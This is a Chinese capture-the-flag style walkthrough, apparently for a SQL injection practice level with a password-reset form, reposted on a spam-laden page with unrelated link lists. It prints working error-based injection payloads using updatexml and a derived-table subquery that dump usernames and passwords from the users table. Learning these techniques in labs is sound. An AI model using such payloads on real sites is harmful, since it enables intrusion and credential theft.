当前位置: 首页 > wzjs >正文

个人简单网站页百度seo搜搜

个人简单网站页,百度seo搜搜,https网站开发如何配置,湖南网站推广哪家专业一、审题这关显示是密码重置的界面。在用户名的输入框内测试,发现注入语句都没有效果。二、思考查看一下源码,发现用户名输入框使用check_input()函数进行了过滤。function check_input($value) {// 1. 输入值非空检查if(!empty($value)) {// 2. 输入长度…

一、审题

这关显示是密码重置的界面。在用户名的输入框内测试,发现注入语句都没有效果。

二、思考

查看一下源码,发现用户名输入框使用check_input()函数进行了过滤。

function check_input($value)
{// 1. 输入值非空检查if(!empty($value)) {// 2. 输入长度截断 (最多15字符)$value = substr($value,0,15);}// 3. 魔术引号处理if (get_magic_quotes_gpc()) {// 4. 移除自动添加的反斜杠$value = stripslashes($value);}// 5. 数字类型判断if (!ctype_digit($value)) {// 6. 非数字处理:转义+单引号包裹$value = "'" . mysql_real_escape_string($value) . "'";} else {// 7. 数字处理:转换为整数$value = intval($value);}return $value;
}

也就是说,必须输入真实有效的用户名,才能进行密码修改的操作,但是密码输入框没有做过滤。用户名输入admin,密码输入123456,提示修改成功。再修改密码,输入单引号,页面回显报错。

那么测试一下报错注入,发现是可以成功注入。

这里还需要注意一个问题,更新密码的操作是update,为数据操作语言(DML),而select是数据查询语言(DQL),两个不能在同一语句中执行,所以查询users表中字段数据会报错。

 -1' and updatexml(1,concat(0x7e,(select group_concat(username,password) from users)),1) #

解决的办法就是,创建一个独立的子查询,将结果集作为一张临时表,然后通过查询临时表获取数据。

-1' and updatexml(1,concat(0x7e,(select group_concat(username,password) from (select username,password from users)a)),1)#

这里的(select username,password from users)a意思是执行一个独立的子查询作为临时表,别名为a,再将其整合到update语句中。

对于报错回显字符有限制的局限,可以使用字符串截断函数进行截断回显。

三、做法

爆数据库名,爆表名,爆字段,爆数据。

http://www.dtcms.com/wzjs/419509.html

相关文章:

  • 做视频网站怎么赚钱买卖交易网
  • 佛山新网站建设服务百度推广客户端教程
  • 最新企业名录搜索软件单页站好做seo吗
  • 建设网站制作官网建站多少钱
  • 软件如何开发制作seo算法培训
  • 自己做网站要买什么seo站群优化
  • 南宁做网站 的seo外链建设的方法
  • 网站建设一般多钱网络营销策划步骤
  • 做网站UI工具游戏推广平台代理
  • 网站建设外包 源代码百度助手手机下载
  • 做网站新闻百度免费推广怎么操作
  • 网站设计申请书创建网站的软件
  • 网站支付功能报价优化大师手机版
  • wordpress支付回调seo实战培训班
  • 徐闻网站建设公司免费网站收录网站推广
  • 电子商务网站建设文案百度推广怎么添加关键词
  • 兴义 网站建设腾讯企点官网下载
  • 三只松鼠电商网站建设商城网站开发公司
  • 做外贸的有哪些网站网站排名推广推荐
  • 企业成品网站模板上海不限关键词优化
  • 雄安建设工程信息网绍兴seo网站优化
  • 做网站要具备哪些手机注册网站
  • 专业网站制作的公司哪家好微信管理系统软件
  • wordpress管局备案优化营商环境 提升服务效能
  • 做网站赚钱 2017网站推广方案策划
  • wordpress create a networkseo俱乐部
  • 做网站没有数据库公众号免费推广平台
  • 做问卷美观的网站创建免费网站
  • 网站开发主要技术路线今日重要新闻
  • 哪个网站音乐做的最好的如何用html制作网页